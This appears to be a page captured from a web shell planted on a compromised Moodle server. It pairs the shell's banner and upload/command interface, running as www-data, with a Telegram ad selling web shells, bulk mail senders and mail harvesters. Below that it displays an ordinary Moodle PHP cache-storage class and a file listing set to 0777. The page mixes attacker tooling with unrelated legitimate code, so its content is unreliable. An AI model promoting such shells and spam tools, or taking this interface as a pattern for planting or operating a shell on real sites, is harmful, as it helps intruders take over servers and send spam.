__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.

namespace core\local\guzzle;

use Kevinrob\GuzzleCache\CacheEntry;
use Kevinrob\GuzzleCache\Storage\CacheStorageInterface;

/**
 * Cache storage handler to handle cache objects, TTL etc.
 *
 * @package    core
 * @copyright  2022 safatshahin <safat.shahin@moodle.com>
 * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */
class cache_storage implements CacheStorageInterface {

    /**
     * The cache pool.
     *
     * @var cache_handler
     */
    protected $cachepool;

    /**
     * The last item retrieved from the cache.
     *
     * This item is transiently stored so that save() can reuse the cache item
     * usually retrieved by fetch() beforehand, instead of requesting it a second time.
     *
     * @var cache_item|null
     */
    protected $lastitem;

    /**
     * TTL for the cache.
     *
     * @var int|null time to live.
     */
    private int $ttl;

    public function __construct(cache_handler $cachepool, ?int $ttl = null) {
        $this->cachepool = $cachepool;
        $this->ttl = $ttl;
    }

    public function fetch($key): ?CacheEntry {
        // Refresh the cache files.
        if ($this->ttl) {
            $this->cachepool->refresh($this->ttl);
        }
        $item = $this->cachepool->get_item($key, $this->ttl);
        $this->lastitem = $item;

        $cache = $item->get();

        if ($cache instanceof CacheEntry) {
            return $cache;
        }

        return null;
    }

    public function save($key, CacheEntry $data): bool {
        if ($this->lastitem && $this->lastitem->get_key() === $key) {
            $item = $this->lastitem;
        } else {
            $item = $this->cachepool->get_item($key);
        }

        $this->lastitem = null;

        $item->set($data);

        // Check if the TTL is set, otherwise use from data.
        $ttl = $this->ttl ?? $data->getTTL();

        if ($ttl === 0) {
            // No expiration.
            $item->expires_after(null);
        } else {
            $item->expires_after($ttl);
        }

        return $this->cachepool->save($item);
    }

    public function delete($key): bool {
        if (null !== $this->lastitem && $this->lastitem->get_key() === $key) {
            $this->lastitem = null;
        }

        return $this->cachepool->delete_item($key);
    }

}

Filemanager

Name Type Size Permission Actions
cache_handler.php File 8.83 KB 0777
cache_item.php File 6.47 KB 0777
cache_storage.php File 2.94 KB 0777
check_request.php File 3.6 KB 0777
redirect_middleware.php File 3.76 KB 0777
Filemanager